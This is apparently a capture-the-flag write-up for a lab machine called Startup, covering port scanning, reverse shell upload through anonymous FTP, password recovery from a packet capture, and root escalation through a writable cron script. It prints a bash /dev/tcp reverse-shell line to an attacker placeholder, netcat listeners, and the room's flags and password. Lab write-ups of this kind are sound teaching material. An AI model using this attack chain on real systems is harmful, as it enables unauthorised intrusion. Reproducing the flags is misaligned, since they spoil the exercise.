================================================================================
CTF WRITEUP: STARTUP
Target IP: 10.201.116.148
================================================================================

1. ENUMERATION & RECON
--------------------------------------------------------------------------------
Command: nmap -sC -sV 10.201.116.148
Results:
- 21/tcp (FTP)  - vsFTDP 3.0.3 (Anonymous Login & Writeable /ftp directory)
- 22/tcp (SSH)  - OpenSSH 7.2p2
- 80/tcp (HTTP) - Apache 2.4.18

Web Discovery (Feroxbuster):
- /files/ : Reflects the contents of the FTP server.

2. INITIAL ACCESS (FTP UPLOAD)
--------------------------------------------------------------------------------
1. Logged into FTP as anonymous.
2. Uploaded a PHP reverse shell to the /ftp directory (writeable).
3. Started listener: nc -lvnp 4444
4. Triggered shell via: http://10.201.116.148/files/ftp/shell.php

Shell Upgrade: python -c "import pty;pty.spawn('/bin/bash')"

3. TRAFFIC ANALYSIS & DATA MINING
--------------------------------------------------------------------------------
- Found /incidents/suspicious.pcapng on the target.
- Transferred the file to my local machine and analyzed with Wireshark.
- Followed TCP Streams: Found a failed sudo attempt revealing the password:
  Password: c4ntg3t3n0ughsp1c3

4. LATERAL MOVEMENT
--------------------------------------------------------------------------------
Command: ssh lennie@10.201.116.148
Password: c4ntg3t3n0ughsp1c3

User Flag: THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

5. PRIVILEGE ESCALATION (SCRIPT HIJACKING)
--------------------------------------------------------------------------------
LinPeas identified a cronjob/process running a script: /usr/bin/planner.sh.
- planner.sh calls another script: /etc/print.sh.
- /etc/print.sh is world-writable and runs as root.

Exploit:
1. Start listener: nc -lvnp 2222
2. Overwrite /etc/print.sh with a reverse shell payload:
   echo "bash -i >& /dev/tcp/[ATTACKER_IP]/2222 0>&1" > /etc/print.sh

Result: Root access granted when the planner.sh script executes.

6. FINAL FLAGS
--------------------------------------------------------------------------------
[USER] cat /home/lennie/user.txt
[ROOT] cat /root/root.txt -> THM{f963aaa6a430f210222158ae15c3d76d}
================================================================================
